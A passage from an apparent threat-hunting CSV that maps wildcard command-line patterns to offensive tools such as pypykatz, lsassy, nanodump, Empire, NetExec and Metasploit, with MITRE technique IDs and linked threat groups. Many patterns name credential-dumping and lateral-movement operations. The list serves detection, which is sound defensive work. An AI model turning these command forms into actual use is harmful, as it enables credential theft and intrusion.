*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live dpapi keys -o *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live dpapi securestring *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - 
TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live dpapi vcred *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live dpapi vpol *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live dpapi wifi*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live kerberos apreq *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live kerberos dump*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live kerberos purge*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential 
Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live kerberos roast*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live kerberos sessions*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live kerberos tgt*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live kerberos triage*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live lsa -o *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live lsa -o *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live 
process create -c regedit*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live smb client *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live smb dcsync *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live smb lsassdump *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live smb regdump *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live smb secretsdump *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live smbapi localgroup enum -t*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - 
T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live smbapi session enum *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live smbapi share enum*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* live users whoami*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* llmnr-resolve.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -LLMNRTTL *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -llmnrtypes AAAA*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"* lltd-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --llvm-obfuscator * ","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","0","N/A","N/A","7","651","113","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" +"* LMHASH:NTHASH*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -LNKPath * -EncScript *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-BackdoorLNK.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* load_extra_pots*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --load-dll *ssp.dll*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"* --load-shellcode *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* local class-instances SMS_Authority*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* local class-properties SMS_Authority*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* local grep *ccmsetup started *ccmsetup.log*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* local query * FROM SMS_Authority*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* local secrets -m disk*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* local secrets -m wmi*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* --local-auth --shares*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -LocalPoshC2ProjectDir *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* -LocalPoshC2ProjectDir 
*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* -lockless -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* --loggedon-users*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --lport 1337 *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* LPORT=4444*","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1043 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* lsa minidump * -o *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* lsa minidump *.dmp*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* lsa minidump *.dmp*","offensive_tool_keyword","pypykatz","Mimikatz 
implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* lsa minidump /*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* lsass.dmp*","offensive_tool_keyword","AD exploitation cheat sheet","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* lsass_creds.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* lsassy -k -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* lsassy*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential 
Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"* lu-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -M dfscoerce *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M empire_exec -o LISTENER=http-listener*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M gpp_autologin*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M handlekatz *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - 
T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M keepass_discover *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M keepass_discover*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M keepass_trigger -o ACTION=ALL USER=*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 